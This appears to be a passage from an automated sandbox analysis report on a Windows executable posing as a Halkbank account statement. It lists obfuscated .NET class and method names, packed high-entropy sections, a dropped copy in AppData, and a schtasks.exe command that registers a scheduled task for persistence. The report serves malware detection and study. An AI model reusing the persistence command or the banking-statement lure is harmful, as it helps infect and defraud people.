Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D113DF push edi; retf	0_2_04D113FE
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D11CCF push ds; retf	0_2_04D11CD7
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D11D6A push ebp; retf	0_2_04D11D6C
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D11D14 push ds; retf	0_2_04D11D22
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D11EE1 push ebp; retf	0_2_04D11EE3
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_07958FD7 push esp; retf	0_2_07958F97
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_07958FD7 push esp; retf	0_2_07958FE6
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_07958F40 push esp; retf	0_2_07958F4E
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_07276772 push esp; ret	10_2_07276779
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 15_2_0289F273 push ebp; retf	15_2_0289F281

Source: Halkbank_Ekstre_20241022_081224_563756.exe	Static PE information: section name: .text entropy: 7.53075334816428
Source: bAZAANr.exe.0.dr	Static PE information: section name: .text entropy: 7.53075334816428

Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, VWsMUYWnICEfL9kgbV.cs	High entropy of concatenated method names: 'u0CQoHn9bb', 'WyoQYbFoVu', 'rucQO1u87m', 'KeQQs2W7FY', 'CF4QXILlbY', 'GPRQKrldwo', 'kXwQaq8wVO', 'R6nQc8WKcM', 'aURQnkKkvq', 'yUwQkToTEP'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, NXV43Wh7Fv2xR9NkU9.cs	High entropy of concatenated method names: 'ToString', 'eBv3S984S6', 'oYD3gusjbH', 'miF3PqKPJi', 'E7W3x1hOSL', 'L1U3vWCRjV', 'gmU30BRAUm', 'Mgh3fCGtRX', 'fWB3pTPKje', 'yGx3WRDqsv'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, f2LMfAb1MJlX6nPr5UN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uub5INtjIO', 'TTH5yk0On8', 'KB95hx7WJG', 'QNB5uiCdJw', 'UH659Vcogp', 'Jc35VIkkSl', 'moP57gZ0qZ'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, AnHe73jAv0NaVt9GG1.cs	High entropy of concatenated method names: 'Dispose', 'md0bBypXDN', 'QbfwgNewB7', 'AjdeeIb341', 'QTpbHMna2r', 'kxpbzhTI3Y', 'ProcessDialogKey', 'fcGwiSLCBG', 'XLfwb0rVt7', 'A9nwwe80QK'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, MVyVYm6fXLhtgOBxmf.cs	High entropy of concatenated method names: 'QJZbQlEOri', 'IsCbLWqLv4', 'pt1bGZWccu', 's0nbTkmZ6g', 'VUMbZ5PjT5', 'NZub3murGN', 'LJQvw8mRqjOL1TluB5', 'MhZJqTiowT7c0KhokT', 'DljbbUG31O', 'eLwb1dD3Nc'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, kko6jCmwQBnfNgAKnN.cs	High entropy of concatenated method names: 'SeDtcbyhSV', 'fRntnt0Zai', 'LZZtdg6ohb', 'xNgtgpk3Ui', 'VH6tx4X3CN', 'c05tvYJNH1', 'eDKtfZ6xYA', 'AoPtpBUYv7', 'dj7tM7PZ2T', 'SvJtSvuu3Z'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, so3oARbioopjITbOm7j.cs	High entropy of concatenated method names: 'agJJoolkNc', 'URBJYX4Ta4', 'mAMJO2uLYk', 'm4uJsp7Qpr', 'LMfJXA5ZXx', 'l3cJKiBP3r', 'T34JawO2Mu', 'Oa3JcNThRf', 'I5vJnXXeO1', 'hU1Jka5KT0'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, mQSt3NucDk12gmQZYG.cs	High entropy of concatenated method names: 'hUI2GhqesH', 'gfC2T43APE', 'ToString', 'fbM2A1V3AH', 'ECc2jKsfne', 'Slx2lmv7ct', 'KHq2e3HIxb', 'k6A2EAdaif', 'UmN2Qdp8Ek', 'G3L2LTIUWS'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, mSLCBGBULf0rVt7s9n.cs	High entropy of concatenated method names: 'LbMNdPgEEM', 'vYNNgA0wRw', 'mqONPOfd2m', 'z7UNxjFpfq', 'EF2NI10aVl', 'DXNNvCr18Q', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, THRDKbwU3E4jbjouH0.cs	High entropy of concatenated method names: 'IyQOM2rlr', 'm6msZBye9', 'QWEKxTV4Q', 'GtaablDeL', 'mN5nqyX22', 'muckmCeQ7', 'UGiWI9J7ubWXZr5IFI', 'swa242SnynPxGPncpD', 'iTXNYQrM9', 'VnV5w5EmZ'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, eZBkQAznCghVwSbsyU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lk5JtKf3HD', 'LNuJZOVBLX', 'EPKJ3716iG', 'QAwJ2Pk7Vh', 'yJPJNSqFIl', 'AmdJJUdC1s', 'Sf2J5nhTPB'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, QZ6gjLk0AguZk7UM5P.cs	High entropy of concatenated method names: 'mDueXP95iw', 'YHgeaRs0wq', 'dWulPwDyl6', 'ICplx9eUOB', 'to3lvcXVM7', 'ctpl0QFwCD', 'sYtlfkFWAa', 'k2nlpmxOQP', 'jwKlWd2bpe', 'DIWlMOx2iu'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, mabO61INbd98MEAf9T.cs	High entropy of concatenated method names: 'I3nZMoTiOk', 'cgWZqG39Zb', 'lO0ZIurNIy', 'kQBZyE168k', 'v2HZgTZTAn', 'M9mZPUQY5R', 'QWMZxSVwrt', 'xmMZvYRauN', 'rydZ0G7G04', 'd2RZf1OMJN'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, h80QKyHIPT0ST3uGTB.cs	High entropy of concatenated method names: 'zfoJbL4LVS', 'aOXJ1jWAZm', 'WSyJ6lslNe', 'PXpJAX47hj', 'Q05Jj443ZA', 'hadJeEKWvl', 'UJtJExrkwA', 'DPgN7NJgTk', 'zU9NU3fmWj', 'mGkNBS3D2s'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, h1u0KhLk9tom65UQqU.cs	High entropy of concatenated method names: 'SnV1Fj4IRS', 'XmB1AiID1T', 'IHb1jDLpsa', 'A5v1lmROQp', 'Hq41e8i3KG', 'VPM1EsYnew', 'mw71QCbkmh', 'zDg1LPfbyR', 'znY1CQvgxC', 'XuX1GP9fMK'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, olEOricPsCWqLv4XFi.cs	High entropy of concatenated method names: 'IkrjIl3C9H', 'KaZjykFu2P', 'r89jhhR4rl', 'QkPjuDNLQb', 'u4Mj9TUCPr', 'ME7jVSHl0I', 'px6j7FbkF7', 'fmfjUcpinY', 'JaRjBa2a4x', 'DnpjHro1Qr'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, chP0CblIrwVtq29dkL.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'S0OwBsIbfw', 'fhBwHCjb4J', 'eaHwzXXqGE', 'dQ31iX5CYT', 'YDi1b18Y9Q', 'VZp1w8Y7C3', 'BtD111kScQ', 'PaPAgaPXInLvX4kq3xO'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, cyiVNFVkN1vHyRgK7E.cs	High entropy of concatenated method names: 'xW02UcFnGZ', 'FRo2HmrF7E', 'DwUNi7Pkng', 'vFpNbrvghD', 'uJb2SSr5Sg', 'ht02qR8vqi', 'tYP2m7ZqPX', 'E8K2IJq6CC', 'xBy2yfQAXj', 'JHq2hPoZFc'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, mpMna2UrLxphTI3Yjc.cs	High entropy of concatenated method names: 'k6PNASRx0l', 'qRNNjY9mOk', 'LLGNl1SOKK', 'xRlNebqKQ0', 'C40NEbyTYD', 'OafNQcBChm', 'qn6NL69weq', 'QreNC9VPB6', 'SuWNGu1DpN', 'DtZNTLcAOF'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, ElxXT3nt1ZWccu50nk.cs	High entropy of concatenated method names: 'LxklsDxTbZ', 'nlXlK8dYwu', 'tuplclbNMx', 'ey3ln2gu54', 'RSclZ21FLS', 'k17l3ax2ut', 'U9fl2fAPiI', 'cqDlNY4H74', 'E5GlJAfo6L', 'u85l5PcknV'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, bIO66tfUsRPUICuxac.cs	High entropy of concatenated method names: 'zrAQApC5IS', 'EOnQljBMad', 'MFfQENPrcP', 'I2nEHedBES', 'Ay0EzFBrfm', 'WZpQi01W5T', 'EbjQbZs5oD', 'YTQQwgQRAs', 'xbJQ1rje6c', 'FbWQ6M3DhW'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, gT5MZudmurGNf09rmQ.cs	High entropy of concatenated method names: 'uCuEFAUpcB', 'ew5Ej7exAH', 'KCfEePnh8p', 'YE7EQE3sZ6', 'ifcEL6WCnr', 'oZhe9Vmbt5', 'SaieVxWkQd', 'TMve7nWKVM', 'QUZeU8F6JS', 'OO9eB68rgk'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.4fd0000.3.raw.unpack, MainForm.cs	High entropy of concatenated method names: 'YgSHuitkd', 'aiP2N9Y7C', 'gHQx79i6W', 'AGv9PUWi3', 'QMsbTCblb', 'beIGikGSa', 'clTPOt4ON', 'fF0vNYCEL', 'C5TCjFvvv', 'ln3BTm5Rw'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.4fd0000.3.raw.unpack, at4ONG9F0NYCELN5Tj.cs	High entropy of concatenated method names: 'nVoxarmF975Urj2p8sJ', 'tIta6WmWAkGE6iVCWgt', 'Y8N2DklRel', 'hpreq0m6Xcu1pidWj9b', 'KFC0XvmT5N8D2LR210h', 'a5foommXYpDAHBV6LjL', 'd3wYgimbV84NAc2fo7p', 'ItvPp5mqvV1adE08UOg', 'KA7rbWmJ0EMRNxYE2Vd', 'PPtPBAmQMyT7QpfjJpI'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, VWsMUYWnICEfL9kgbV.cs	High entropy of concatenated method names: 'u0CQoHn9bb', 'WyoQYbFoVu', 'rucQO1u87m', 'KeQQs2W7FY', 'CF4QXILlbY', 'GPRQKrldwo', 'kXwQaq8wVO', 'R6nQc8WKcM', 'aURQnkKkvq', 'yUwQkToTEP'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, NXV43Wh7Fv2xR9NkU9.cs	High entropy of concatenated method names: 'ToString', 'eBv3S984S6', 'oYD3gusjbH', 'miF3PqKPJi', 'E7W3x1hOSL', 'L1U3vWCRjV', 'gmU30BRAUm', 'Mgh3fCGtRX', 'fWB3pTPKje', 'yGx3WRDqsv'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, f2LMfAb1MJlX6nPr5UN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uub5INtjIO', 'TTH5yk0On8', 'KB95hx7WJG', 'QNB5uiCdJw', 'UH659Vcogp', 'Jc35VIkkSl', 'moP57gZ0qZ'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, AnHe73jAv0NaVt9GG1.cs	High entropy of concatenated method names: 'Dispose', 'md0bBypXDN', 'QbfwgNewB7', 'AjdeeIb341', 'QTpbHMna2r', 'kxpbzhTI3Y', 'ProcessDialogKey', 'fcGwiSLCBG', 'XLfwb0rVt7', 'A9nwwe80QK'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, MVyVYm6fXLhtgOBxmf.cs	High entropy of concatenated method names: 'QJZbQlEOri', 'IsCbLWqLv4', 'pt1bGZWccu', 's0nbTkmZ6g', 'VUMbZ5PjT5', 'NZub3murGN', 'LJQvw8mRqjOL1TluB5', 'MhZJqTiowT7c0KhokT', 'DljbbUG31O', 'eLwb1dD3Nc'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, kko6jCmwQBnfNgAKnN.cs	High entropy of concatenated method names: 'SeDtcbyhSV', 'fRntnt0Zai', 'LZZtdg6ohb', 'xNgtgpk3Ui', 'VH6tx4X3CN', 'c05tvYJNH1', 'eDKtfZ6xYA', 'AoPtpBUYv7', 'dj7tM7PZ2T', 'SvJtSvuu3Z'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, so3oARbioopjITbOm7j.cs	High entropy of concatenated method names: 'agJJoolkNc', 'URBJYX4Ta4', 'mAMJO2uLYk', 'm4uJsp7Qpr', 'LMfJXA5ZXx', 'l3cJKiBP3r', 'T34JawO2Mu', 'Oa3JcNThRf', 'I5vJnXXeO1', 'hU1Jka5KT0'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, mQSt3NucDk12gmQZYG.cs	High entropy of concatenated method names: 'hUI2GhqesH', 'gfC2T43APE', 'ToString', 'fbM2A1V3AH', 'ECc2jKsfne', 'Slx2lmv7ct', 'KHq2e3HIxb', 'k6A2EAdaif', 'UmN2Qdp8Ek', 'G3L2LTIUWS'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, mSLCBGBULf0rVt7s9n.cs	High entropy of concatenated method names: 'LbMNdPgEEM', 'vYNNgA0wRw', 'mqONPOfd2m', 'z7UNxjFpfq', 'EF2NI10aVl', 'DXNNvCr18Q', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, THRDKbwU3E4jbjouH0.cs	High entropy of concatenated method names: 'IyQOM2rlr', 'm6msZBye9', 'QWEKxTV4Q', 'GtaablDeL', 'mN5nqyX22', 'muckmCeQ7', 'UGiWI9J7ubWXZr5IFI', 'swa242SnynPxGPncpD', 'iTXNYQrM9', 'VnV5w5EmZ'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, eZBkQAznCghVwSbsyU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lk5JtKf3HD', 'LNuJZOVBLX', 'EPKJ3716iG', 'QAwJ2Pk7Vh', 'yJPJNSqFIl', 'AmdJJUdC1s', 'Sf2J5nhTPB'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, QZ6gjLk0AguZk7UM5P.cs	High entropy of concatenated method names: 'mDueXP95iw', 'YHgeaRs0wq', 'dWulPwDyl6', 'ICplx9eUOB', 'to3lvcXVM7', 'ctpl0QFwCD', 'sYtlfkFWAa', 'k2nlpmxOQP', 'jwKlWd2bpe', 'DIWlMOx2iu'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, mabO61INbd98MEAf9T.cs	High entropy of concatenated method names: 'I3nZMoTiOk', 'cgWZqG39Zb', 'lO0ZIurNIy', 'kQBZyE168k', 'v2HZgTZTAn', 'M9mZPUQY5R', 'QWMZxSVwrt', 'xmMZvYRauN', 'rydZ0G7G04', 'd2RZf1OMJN'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, h80QKyHIPT0ST3uGTB.cs	High entropy of concatenated method names: 'zfoJbL4LVS', 'aOXJ1jWAZm', 'WSyJ6lslNe', 'PXpJAX47hj', 'Q05Jj443ZA', 'hadJeEKWvl', 'UJtJExrkwA', 'DPgN7NJgTk', 'zU9NU3fmWj', 'mGkNBS3D2s'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, h1u0KhLk9tom65UQqU.cs	High entropy of concatenated method names: 'SnV1Fj4IRS', 'XmB1AiID1T', 'IHb1jDLpsa', 'A5v1lmROQp', 'Hq41e8i3KG', 'VPM1EsYnew', 'mw71QCbkmh', 'zDg1LPfbyR', 'znY1CQvgxC', 'XuX1GP9fMK'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, olEOricPsCWqLv4XFi.cs	High entropy of concatenated method names: 'IkrjIl3C9H', 'KaZjykFu2P', 'r89jhhR4rl', 'QkPjuDNLQb', 'u4Mj9TUCPr', 'ME7jVSHl0I', 'px6j7FbkF7', 'fmfjUcpinY', 'JaRjBa2a4x', 'DnpjHro1Qr'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, chP0CblIrwVtq29dkL.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'S0OwBsIbfw', 'fhBwHCjb4J', 'eaHwzXXqGE', 'dQ31iX5CYT', 'YDi1b18Y9Q', 'VZp1w8Y7C3', 'BtD111kScQ', 'PaPAgaPXInLvX4kq3xO'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, cyiVNFVkN1vHyRgK7E.cs	High entropy of concatenated method names: 'xW02UcFnGZ', 'FRo2HmrF7E', 'DwUNi7Pkng', 'vFpNbrvghD', 'uJb2SSr5Sg', 'ht02qR8vqi', 'tYP2m7ZqPX', 'E8K2IJq6CC', 'xBy2yfQAXj', 'JHq2hPoZFc'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, mpMna2UrLxphTI3Yjc.cs	High entropy of concatenated method names: 'k6PNASRx0l', 'qRNNjY9mOk', 'LLGNl1SOKK', 'xRlNebqKQ0', 'C40NEbyTYD', 'OafNQcBChm', 'qn6NL69weq', 'QreNC9VPB6', 'SuWNGu1DpN', 'DtZNTLcAOF'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, ElxXT3nt1ZWccu50nk.cs	High entropy of concatenated method names: 'LxklsDxTbZ', 'nlXlK8dYwu', 'tuplclbNMx', 'ey3ln2gu54', 'RSclZ21FLS', 'k17l3ax2ut', 'U9fl2fAPiI', 'cqDlNY4H74', 'E5GlJAfo6L', 'u85l5PcknV'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, bIO66tfUsRPUICuxac.cs	High entropy of concatenated method names: 'zrAQApC5IS', 'EOnQljBMad', 'MFfQENPrcP', 'I2nEHedBES', 'Ay0EzFBrfm', 'WZpQi01W5T', 'EbjQbZs5oD', 'YTQQwgQRAs', 'xbJQ1rje6c', 'FbWQ6M3DhW'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, gT5MZudmurGNf09rmQ.cs	High entropy of concatenated method names: 'uCuEFAUpcB', 'ew5Ej7exAH', 'KCfEePnh8p', 'YE7EQE3sZ6', 'ifcEL6WCnr', 'oZhe9Vmbt5', 'SaieVxWkQd', 'TMve7nWKVM', 'QUZeU8F6JS', 'OO9eB68rgk'

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

File created: C:\Users\user\AppData\Roaming\bAZAANr.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
